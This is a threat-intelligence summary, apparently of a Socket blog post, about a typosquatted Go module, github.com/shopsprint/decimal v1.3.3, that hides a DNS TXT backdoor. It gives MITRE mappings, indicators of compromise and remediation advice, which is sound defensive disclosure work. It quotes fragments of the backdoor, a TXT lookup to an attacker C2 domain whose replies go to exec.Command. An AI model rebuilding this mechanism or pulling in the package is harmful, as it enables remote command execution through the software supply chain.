Socket’s Threat Research Team identified a typosquatted Go module, github.com/shopsprint/decimal, that mimics the legitimate github.com/shopspring/decimal library and was weaponized in v1.3.3 with a DNS TXT-based backdoor. The malicious release remains fetchable through proxy.golang.org and pkg.go.dev even after the GitHub repository and owner account were removed, creating ongoing supply chain risk for any project that imports it. #githubcomshopsprintdecimal #githubcomshopspringdecimal #freemyipcom
Keypoints
- Socket found a malicious Go module published as github.com/shopsprint/decimal, a one-character typosquat of the legitimate github.com/shopspring/decimal.
- The package was present since 2017, but version v1.3.3 published on 2023-08-19 added a malicious init() backdoor.
- The payload uses DNS TXT queries to dnslog-cdn-images.freemyip.com as a command-and-control channel and executes returned TXT values with os/exec.
- The malicious code runs automatically on import in a background goroutine and can persist for the lifetime of any process that depends on it.
- Even though the GitHub repo and owner account were deleted, the malicious version remains available through proxy.golang.org and pkg.go.dev.
- The legitimate shopspring/decimal package is widely used, making this typosquat a high-value supply chain target.
- Socket recommends removing the dependency, replacing it with the canonical package, and alerting on TXT lookups to the listed domain.
MITRE Techniques
- [T1195.002 ] Compromise Software Supply Chain – The attacker poisoned a trusted Go module by publishing a typosquatted package that looked legitimate until it was weaponized (‘a malicious Go module published as github.com/shopsprint/decimal’).
- [T1071.004 ] Application Layer Protocol: DNS – The backdoor used DNS TXT queries as its command-and-control channel (‘net.LookupTXT(“dnslog-cdn-images.freemyip.com”)’).
- [T1059 ] Command and Scripting Interpreter – Returned TXT values were executed directly as commands via Go process execution (‘Each TXT value returned by the C2 subdomain is passed directly to exec.Command(txt)’).
- [T1583.001 ] Acquire Infrastructure: Domains – The attacker used a domain/subdomain on a dynamic DNS provider to host C2 infrastructure (‘dnslog-cdn-images.freemyip.com’ on freemyip.com).
- [T1572 ] Protocol Tunneling – The operator concealed C2 traffic inside DNS TXT records rather than using a more obvious channel (‘DNS TXT is a covert channel rather than a transport’).
- [T1568 ] Dynamic Resolution – The C2 endpoint was controlled through a dynamic DNS service, allowing the operator to change records quickly (‘The use of TXT records … through their DDNS account’).
Indicators of Compromise
- [Malicious Package ] trojanized Go module and version – github.com/shopsprint/decimal v1.3.3, github.com/shopspring/decimal (legitimate reference)
- [Domain ] DNS C2 host used by the payload – dnslog-cdn-images.freemyip.com, freemyip.com
- [File Hashes ] malicious release and source file hashes – SHA-256 dd9c0268c8944e6ddf90d4d0c81aa843785b7a9ee965faa635841ed9fc0ba086, SHA-256 387d7ea5ca733b1e7219c943f4b461877a8df0148adfef42b1538b6c398fbb41
- [Commit Hash ] malicious commit associated with the release – 2f0ee073c6f29d66188a845592029c9b52528f04
- [File Name ] trojanized source file referenced in the diff – decimal.go, v1.3.3 module zip
Read more: https://socket.dev/blog/popular-go-decimal-library-typosquat-dns-backdoor